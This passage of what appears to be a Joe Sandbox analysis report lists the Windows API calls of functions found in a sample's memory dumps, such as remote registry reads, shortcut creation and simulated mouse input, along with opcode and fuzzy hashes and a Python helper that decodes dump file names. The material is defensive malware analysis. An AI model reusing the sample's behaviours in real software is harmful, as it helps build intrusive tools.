                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1414292761-0
                                                                                                                                                                                                                                  • Opcode ID: 7f6c222535f7a6c7cfd61b983ddc603cc20eb8627ac7a71c72ee25553e3dcfe2
                                                                                                                                                                                                                                  • Instruction ID: 0103a07a5981a168bfc5e3126cbbcdcbd4221cddd7bd40937734577174364227
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7f6c222535f7a6c7cfd61b983ddc603cc20eb8627ac7a71c72ee25553e3dcfe2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0D51E172E00206AFEB258F64CD85FBB77AAEB84754F144A6DFC08D6140EB35DC51C6A2
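The memory dump names repeated in every entry of this report encode the dumped region's process, run, base address, page protection and region type. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it decodes those names and picks out the executable region (here the one at 0x991000 with PAGE_EXECUTE_READ), which is the dump to load against the 0x990000 base named in the Snapshot File. The dot-separated field layout it assumes is inferred from the values on this page rather than taken from Joe Sandbox documentation, and is marked as an assumption in the code; the PAGE_* and MEM_* constants are the standard winnt.h values.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List

# Dump file names as they appear in this report, e.g.
#   0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp
# ASSUMPTION: the field layout (PID, run number, dump id, base address,
# page protection, unknown, memory type, unknown) is inferred from the values
# on this page, not taken from Joe Sandbox documentation. The two fields
# marked unknown are captured but deliberately not interpreted.
_DUMP_NAME = re.compile(
    r"^(?P<pid>[0-9A-Fa-f]{8})\."
    r"(?P<run>[0-9A-Fa-f]{8})\."
    r"(?P<dump_id>[0-9A-Fa-f]+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\."
    r"(?P<protect>[0-9A-Fa-f]{8})\."
    r"(?P<unknown1>[0-9A-Fa-f]{8})\."
    r"(?P<mem_type>[0-9A-Fa-f]{8})\."
    r"(?P<unknown2>[0-9A-Fa-f]{8})\.sdmp$"
)

# Standard Win32 page-protection and region-type constants (winnt.h).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}


@dataclass(frozen=True)
class DumpRegion:
    name: str
    pid: int
    run: int
    base: int
    protect: int
    mem_type: int

    @property
    def protect_name(self) -> str:
        low = self.protect & 0xFF
        names = [PAGE_PROTECT.get(low, f"0x{low:02X}")]
        names += [n for bit, n in PAGE_MODIFIERS.items() if self.protect & bit]
        return "|".join(names)

    @property
    def mem_type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:08X}")

    @property
    def is_executable(self) -> bool:
        # All PAGE_EXECUTE* values live in bits 0x10..0x80 of the low byte.
        return bool(self.protect & 0xF0)


def parse_dump_name(name: str) -> DumpRegion:
    """Decode one .sdmp file name; raises ValueError on anything else."""
    m = _DUMP_NAME.match(name)
    if m is None:
        raise ValueError(f"not a Joe Sandbox memory dump name: {name!r}")
    return DumpRegion(
        name=name,
        pid=int(m["pid"], 16),
        run=int(m["run"], 16),
        base=int(m["base"], 16),
        protect=int(m["protect"], 16),
        mem_type=int(m["mem_type"], 16),
    )


def executable_regions(names: Iterable[str]) -> List[DumpRegion]:
    """Dumps whose pages were executable, lowest address first: the regions
    to open in a disassembler before the read-only header and data dumps."""
    return sorted((r for r in map(parse_dump_name, names) if r.is_executable),
                  key=lambda r: r.base)


# The six dump names listed for this function in the report (PID 0xA, run 2).
REPORT_DUMPS = [
    "0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp",
    "0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp",
    "0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp",
    "0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp",
    "0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp",
    "0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp",
]

if __name__ == "__main__":
    for r in map(parse_dump_name, REPORT_DUMPS):
        print(f"pid={r.pid} run={r.run} base=0x{r.base:08X} {r.protect_name:<22} {r.mem_type_name}")
    print("executable:", [hex(r.base) for r in executable_regions(REPORT_DUMPS)])
```

Run against the six names above it reports one executable MEM_IMAGE region at 0x991000 (the report's Source File), a PAGE_READONLY region at the 0x990000 image base (the PE header) and PAGE_READONLY/PAGE_READWRITE regions for the remaining sections, which is the split you would expect for the .text, header and data sections of a mapped PE.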

APIs
  • Part of subcall function 0099B329: _wcslen.LIBCMT ref: 0099B333
  • Part of subcall function 00A1D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A1C10E,?,?), ref: 00A1D415
  • Part of subcall function 00A1D3F8: _wcslen.LIBCMT ref: 00A1D451
  • Part of subcall function 00A1D3F8: _wcslen.LIBCMT ref: 00A1D4C8
  • Part of subcall function 00A1D3F8: _wcslen.LIBCMT ref: 00A1D4FE
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A1C72A
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A1C785
• RegCloseKey.ADVAPI32(00000000), ref: 00A1C7CA
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00A1C7F9
• RegCloseKey.ADVAPI32(?,?,00000000), ref: 00A1C853
• RegCloseKey.ADVAPI32(?), ref: 00A1C85F
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
• String ID:
• API String ID: 1120388591-0
• Opcode ID: 74274ca6a9df35fcb40693a51a2618ea609eb4de7c7d3f1c5598611f81ff7f25
• Instruction ID: 9722e22ceee263ed3c45d2a60fdf20492fc549a7da335cd275cdaf1c3c21835e
• Opcode Fuzzy Hash: 74274ca6a9df35fcb40693a51a2618ea609eb4de7c7d3f1c5598611f81ff7f25
• Instruction Fuzzy Hash: FF81AF71108241AFD714DF28C885F6ABBE5FF84318F14845CF0594B2A2DB71ED46CB92

APIs
• VariantInit.OLEAUT32(00000035), ref: 009F00A9
• SysAllocString.OLEAUT32(00000000), ref: 009F0150
• VariantCopy.OLEAUT32(009F0354,00000000), ref: 009F0179
• VariantClear.OLEAUT32(009F0354), ref: 009F019D
• VariantCopy.OLEAUT32(009F0354,00000000), ref: 009F01A1
• VariantClear.OLEAUT32(?), ref: 009F01AB
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: Variant$ClearCopy$AllocInitString
• String ID:
• API String ID: 3859894641-0
• Opcode ID: 59b2c437812beed225a4e81808c9b0ebc15dc194218009f3f27b6dd7d3ea96a9
• Instruction ID: 7c7dcc924ce556a079b1ed799f39a07a5e28809fdfe1a2aade8a17a232ead2af
• Opcode Fuzzy Hash: 59b2c437812beed225a4e81808c9b0ebc15dc194218009f3f27b6dd7d3ea96a9
• Instruction Fuzzy Hash: A251FC31600318A6DF20AB64988977DB3ADEFC5310F249457FA05DF297DB749C41DBA1

APIs
  • Part of subcall function 009941EA: _wcslen.LIBCMT ref: 009941EF
  • Part of subcall function 00998577: _wcslen.LIBCMT ref: 0099858A
• GetOpenFileNameW.COMDLG32(00000058), ref: 00A09F2A
• _wcslen.LIBCMT ref: 00A09F4B
• _wcslen.LIBCMT ref: 00A09F72
• GetSaveFileNameW.COMDLG32(00000058), ref: 00A09FCA
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: _wcslen$FileName$OpenSave
• String ID: X
• API String ID: 83654149-3081909835
• Opcode ID: bb17e8d7c035e06964843b08d04c59f390728db9777b6aa59ea6baa6e38f0411
• Instruction ID: 61cdc525f388bbbc65e23721c6ac0c3d00c13a11885051684f08d9423c49f119
• Opcode Fuzzy Hash: bb17e8d7c035e06964843b08d04c59f390728db9777b6aa59ea6baa6e38f0411
• Instruction Fuzzy Hash: ADE180715083459FDB24EF28D881B6BB7E4BF84314F04896DF8899B2A2DB31DD05CB92

APIs
• _wcslen.LIBCMT ref: 00A06F21
• CoInitialize.OLE32(00000000), ref: 00A0707E
• CoCreateInstance.OLE32(00A30CC4,00000000,00000001,00A30B34,?), ref: 00A07095
• CoUninitialize.OLE32 ref: 00A07319
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: CreateInitializeInstanceUninitialize_wcslen
• String ID: .lnk
• API String ID: 886957087-24824748
                                                                                                                                                                                                                                  • Opcode ID: 873e79de0ae9271fbd99992b69afca23479dc716640f7a438f8079f331cc4a69
                                                                                                                                                                                                                                  • Instruction ID: 226c0e71c8b7a607a5cc87979beda255b3ac8f6285c4bfd2ab193f676f85da73
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 873e79de0ae9271fbd99992b69afca23479dc716640f7a438f8079f331cc4a69
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 70D14771508205AFD700EF28D881E6BB7E8FF98708F40496DF5858B2A2DB71ED05CB92
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0099249F: GetWindowLongW.USER32(00000000,000000EB), ref: 009924B0
                                                                                                                                                                                                                                  • BeginPaint.USER32(?,?,?), ref: 00991B35
                                                                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00991B99
                                                                                                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00991BB6
                                                                                                                                                                                                                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00991BC7
                                                                                                                                                                                                                                  • EndPaint.USER32(?,?,?,?,?), ref: 00991C15
                                                                                                                                                                                                                                  • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 009D3287
                                                                                                                                                                                                                                    • Part of subcall function 00991C2D: BeginPath.GDI32(00000000), ref: 00991C4B
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3050599898-0
                                                                                                                                                                                                                                  • Opcode ID: f7d5805a7d035de653c49748296cd2f298aa19d49c4592ac1debddb2ef159569
                                                                                                                                                                                                                                  • Instruction ID: 7e684eea8f8d16c68da9407ae330ffd1ef27497a804b9065ad6eec3c82aaea88
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f7d5805a7d035de653c49748296cd2f298aa19d49c4592ac1debddb2ef159569
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5E41F171544301AFDB20DF68DC84FB67BB8FB85320F044629FAA4872B2C7709946DB62
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 00A011B3
                                                                                                                                                                                                                                  • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00A011EE
                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 00A0120A
                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 00A01283
                                                                                                                                                                                                                                  • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00A0129A
                                                                                                                                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00A012C8
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3368777196-0
                                                                                                                                                                                                                                  • Opcode ID: ba42112f5d6e944da3bb0f99e17225e7d5f00c3ab465249ea54903ced616dcbf
                                                                                                                                                                                                                                  • Instruction ID: f44d96d3c31bf6fccb8773a657078128231df25d84fb6d71e29f00daf58395cc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ba42112f5d6e944da3bb0f99e17225e7d5f00c3ab465249ea54903ced616dcbf
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B414C71900205EFDF14DF98DD85AAAB7B8FF48314F1481B5ED00AA296D730DE62DBA4
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,009EFBEF,00000000,?,?,00000000,?,009D39E2,00000004,00000000,00000000), ref: 00A28CA7
                                                                                                                                                                                                                                  • EnableWindow.USER32(?,00000000), ref: 00A28CCD
                                                                                                                                                                                                                                  • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00A28D2C
                                                                                                                                                                                                                                  • ShowWindow.USER32(?,00000004), ref: 00A28D40
                                                                                                                                                                                                                                  • EnableWindow.USER32(?,00000001), ref: 00A28D66
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00A28D8A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 642888154-0
                                                                                                                                                                                                                                  • Opcode ID: daed008428db9df32993ff1673ab42528b4e62a1c0a5d9024d9e9027bb909670
                                                                                                                                                                                                                                  • Instruction ID: 05aa124b7a98f0444cd33163e832c6d6e32dc4f7848a5c11404149109bc59c28
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: daed008428db9df32993ff1673ab42528b4e62a1c0a5d9024d9e9027bb909670
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 05419730603664AFEB25DF68E889BA57BF1FB45304F184075F5085B2A2CB799856CB50
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetForegroundWindow.USER32(?,?,00000000), ref: 00A12D45
                                                                                                                                                                                                                                    • Part of subcall function 00A0EF33: GetWindowRect.USER32(?,?), ref: 00A0EF4B
                                                                                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 00A12D6F
                                                                                                                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 00A12D76
                                                                                                                                                                                                                                  • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00A12DB2
                                                                                                                                                                                                                                  • GetCursorPos.USER32(?), ref: 00A12DDE
                                                                                                                                                                                                                                  • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00A12E3C
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: Window$Rectmouse_event$CursorDesktopForeground
• String ID:
• API String ID: 2387181109-0
• Opcode ID: da997cb0074387c11d69140cb6fa6aef0aa92d8255fbe10f6ea027db439697dc
• Instruction ID: f4817dd131ed4f3d1d16fdba63201bb1555cc5dd9235021bd0a0ed0ae02febe3
• Opcode Fuzzy Hash: da997cb0074387c11d69140cb6fa6aef0aa92d8255fbe10f6ea027db439697dc
• Instruction Fuzzy Hash: 44311072505315AFC720DF58D844FABB7A9FFC4354F000929F88497181DB70E95ACB92
APIs
• IsWindowVisible.USER32(?), ref: 009F55F9
• SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 009F5616
• SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 009F564E
• _wcslen.LIBCMT ref: 009F566C
• CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 009F5674
• _wcsstr.LIBVCRUNTIME ref: 009F567E
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
• String ID:
• API String ID: 72514467-0
• Opcode ID: e59ead8e2fa6efd0a140ff2b0e0ef4da65ec76dfe50348ad7fb2b7a9e412a8ee
• Instruction ID: 7353a7b74ffbe3113d4883e133d6b0bfd942cc129fca581611830f8c792020c3
• Opcode Fuzzy Hash: e59ead8e2fa6efd0a140ff2b0e0ef4da65ec76dfe50348ad7fb2b7a9e412a8ee
• Instruction Fuzzy Hash: AF2138322046087BEB259B78DC49FBB7BACDF84720F158039FA05DA092EF64CC429760
APIs
  • Part of subcall function 00995851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009955D1,?,?,009D4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00995871
• _wcslen.LIBCMT ref: 00A062C0
• CoInitialize.OLE32(00000000), ref: 00A063DA
• CoCreateInstance.OLE32(00A30CC4,00000000,00000001,00A30B34,?), ref: 00A063F3
• CoUninitialize.OLE32 ref: 00A06411
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
• String ID: .lnk
• API String ID: 3172280962-24824748
• Opcode ID: e0a6aaa656054a4527e1f1def73af43b047ccf8476ec5eec2c73175b7dd8b6ec
• Instruction ID: 9861e44eb88686ecdeb1bdd560c12fb020be4e2ce5ec3c0334e4c542a18f0e26
• Opcode Fuzzy Hash: e0a6aaa656054a4527e1f1def73af43b047ccf8476ec5eec2c73175b7dd8b6ec
• Instruction Fuzzy Hash: 1DD14471A042059FCB14DF18D594A6ABBF5FF89718F14885CF8859B3A1CB32EC45CB92
APIs
• GetWindowLongW.USER32(?,000000F0), ref: 00A28740
• SetWindowLongW.USER32(00000000,000000F0,?), ref: 00A28765
• SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00A2877D
• GetSystemMetrics.USER32(00000004), ref: 00A287A6
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00A0C1F2,00000000), ref: 00A287C6
  • Part of subcall function 0099249F: GetWindowLongW.USER32(00000000,000000EB), ref: 009924B0
• GetSystemMetrics.USER32(00000004), ref: 00A287B1
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: Window$Long$MetricsSystem
• String ID:
• API String ID: 2294984445-0
• Opcode ID: 616fc9c49a51bc446ad248791bd4a2118f0b7931007e39f7feffd40b7df9da84
• Instruction ID: d4e291e513c0e2bfb2345e72c0c744af7c2ec2fdb4d192801a32846a16f33160
• Opcode Fuzzy Hash: 616fc9c49a51bc446ad248791bd4a2118f0b7931007e39f7feffd40b7df9da84
• Instruction Fuzzy Hash: 62218E71611261AFCB249F7CDC08A6A3BB6EB84325F244639F926C21E0EF748852CB50
APIs
• GetLastError.KERNEL32(?,?,009B36E9,009B3355), ref: 009B3700
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 009B370E
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 009B3727
• SetLastError.KERNEL32(00000000,?,009B36E9,009B3355), ref: 009B3779
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
• Opcode ID: 428bff0722c8ba7f2f3705af379baffb559754231c12b217e256c290e6237cc7
• Instruction ID: 77ff051eeb42ea29e822525ee483238a2dec17a65e973e8f10afb8bbb4cbbd00
• Opcode Fuzzy Hash: 428bff0722c8ba7f2f3705af379baffb559754231c12b217e256c290e6237cc7
• Instruction Fuzzy Hash: AC0124B260A311AEA734E7F9EFC66E72A98EB447727308239F012840F1EF514E035140
APIs
• GetLastError.KERNEL32(?,00000000,009B4D53,00000000,?,?,009B68E2,?,?,00000000), ref: 009C30EB
